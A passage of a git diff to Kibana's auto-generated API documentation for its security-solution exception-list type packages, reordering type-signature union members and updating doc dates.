\"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[], ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[], unknown>; list_id: ", + "<({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[], ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[], unknown>; list_id: ", "Type", "; name: ", "StringC", @@ -6914,7 +6914,7 @@ "StringC", "; entries: ", "Type", - "<({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[], ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[], unknown>; item_id: ", + "<({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[], ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[], unknown>; item_id: ", "Type", "; list_id: ", "Type", @@ -7847,7 +7847,7 @@ ], "signature": [ "Type", - "<({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[], ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[], unknown>" + "<({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[], ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[], unknown>" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/common/non_empty_entries_array/index.ts", "deprecated": false, @@ -8780,7 +8780,7 @@ "StringC", "; entries: ", "Type", - "<({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[], ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[], unknown>; name: ", + "<({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[], ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[], unknown>; name: ", "StringC", "; type: ", "KeyofC", @@ -8833,7 +8833,7 @@ "StringC", "; entries: ", "Type", - "<({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[], ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[], unknown>; name: ", + "<({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[], ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[], unknown>; name: ", "StringC", "; type: ", "KeyofC", diff --git a/api_docs/kbn_securitysolution_io_ts_list_types.mdx b/api_docs/kbn_securitysolution_io_ts_list_types.mdx index 2040bc26e9ed5..248793ba8147d 100644 --- a/api_docs/kbn_securitysolution_io_ts_list_types.mdx +++ b/api_docs/kbn_securitysolution_io_ts_list_types.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-securitysolution-io-ts-list-types title: "@kbn/securitysolution-io-ts-list-types" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/securitysolution-io-ts-list-types plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/securitysolution-io-ts-list-types'] --- import kbnSecuritysolutionIoTsListTypesObj from './kbn_securitysolution_io_ts_list_types.devdocs.json'; diff --git a/api_docs/kbn_securitysolution_io_ts_types.mdx b/api_docs/kbn_securitysolution_io_ts_types.mdx index 90c4f46a15ccf..40c9a3127d04b 100644 --- a/api_docs/kbn_securitysolution_io_ts_types.mdx +++ b/api_docs/kbn_securitysolution_io_ts_types.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-securitysolution-io-ts-types title: "@kbn/securitysolution-io-ts-types" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/securitysolution-io-ts-types plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/securitysolution-io-ts-types'] --- import kbnSecuritysolutionIoTsTypesObj from './kbn_securitysolution_io_ts_types.devdocs.json'; diff --git a/api_docs/kbn_securitysolution_io_ts_utils.mdx b/api_docs/kbn_securitysolution_io_ts_utils.mdx index 7b8ad94a72267..683968fccd406 100644 --- a/api_docs/kbn_securitysolution_io_ts_utils.mdx +++ b/api_docs/kbn_securitysolution_io_ts_utils.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-securitysolution-io-ts-utils title: "@kbn/securitysolution-io-ts-utils" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/securitysolution-io-ts-utils plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/securitysolution-io-ts-utils'] --- import kbnSecuritysolutionIoTsUtilsObj from './kbn_securitysolution_io_ts_utils.devdocs.json'; diff --git a/api_docs/kbn_securitysolution_list_api.devdocs.json b/api_docs/kbn_securitysolution_list_api.devdocs.json index 79b6b26e9f098..53a9d300892b8 100644 --- a/api_docs/kbn_securitysolution_list_api.devdocs.json +++ b/api_docs/kbn_securitysolution_list_api.devdocs.json @@ -62,7 +62,7 @@ "signature": [ "({ http, listItem, signal, }: ", "AddExceptionListItemProps", - ") => Promise<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }>" + ") => Promise<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }>" ], "path": "packages/kbn-securitysolution-list-api/src/api/index.ts", "deprecated": false, @@ -206,7 +206,7 @@ "signature": [ "({ http, id, namespaceType, signal, }: ", "ApiCallByIdProps", - ") => Promise<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }>" + ") => Promise<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }>" ], "path": "packages/kbn-securitysolution-list-api/src/api/index.ts", "deprecated": false, @@ -245,7 +245,7 @@ "section": "def-common.DeleteListParams", "text": "DeleteListParams" }, - ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }>" + ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | 